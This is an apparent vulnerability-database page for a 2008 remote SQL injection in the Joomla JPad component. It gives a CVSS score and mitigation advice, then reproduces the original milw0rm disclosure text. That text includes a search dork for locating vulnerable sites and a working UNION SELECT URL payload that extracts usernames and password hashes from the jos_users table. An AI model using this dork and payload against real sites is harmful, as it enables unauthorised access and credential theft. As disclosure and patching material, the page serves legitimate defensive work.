Joomla Component JPad Remote SQL Injection

vendor:

JPad

by:

His0k4

7.5

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: JPad

Affected Version From: 1

Affected Version To: 1

Patch Exists: YES

Related CWE: N/A

CPE: a:vandersluijs.nl:jpad:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Joomla Component JPad Remote SQL Injection

A remote SQL injection vulnerability exists in Joomla Component JPad. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to execute arbitrary SQL commands in the back-end database, allowing for the manipulation or disclosure of arbitrary data.

Mitigation:

The vendor has released an update to address this vulnerability. Users are advised to update to the latest version of the application.

Source

Exploit-DB raw data:

#########################################################
#							#
#     Joomla Component JPad Remote SQL Injection	#
#							#
#########################################################

########################################

[*] Founded by : His0k4 (Algerian HaCkeR);
[*] Contact: His0k4[at]gmail.com
[*] Greetz : All friends & muslims HaCkeRs  :) 

########################################

[*] Script_Name: "Joomla"
[*] Component_Name: "JPad"


########################################

[*] DORK: allinurl:com_jpad

########################################

[*] P.O.C: /index.php?option=com_jpad&task=edit&Itemid=39&cid=[SQL]
[*] Example: /index.php?option=com_jpad&task=edit&Itemid=39&cid=-1 UNION ALL SELECT 1,2,3,concat_ws(0x3a,username,password),5,6,7,8 from jos_users--
[*] Note : You have to register an account in the site.
########################################

side note:
  <name>JPad</name>
  <creationDate>31/06/2007</creationDate>
  <author>Theo van der Sluijs</author>
  <copyright>(c) 2007 VanderSluijs.nl</copyright>
  <authorEmail>theo@vandersluijs.nl</authorEmail>

  <authorUrl>www.vandersluijs.nl</authorUrl>
  <version>1.0</version>
  <description>Component to create notepad files. (see about)</description>

# milw0rm.com [2008-04-24]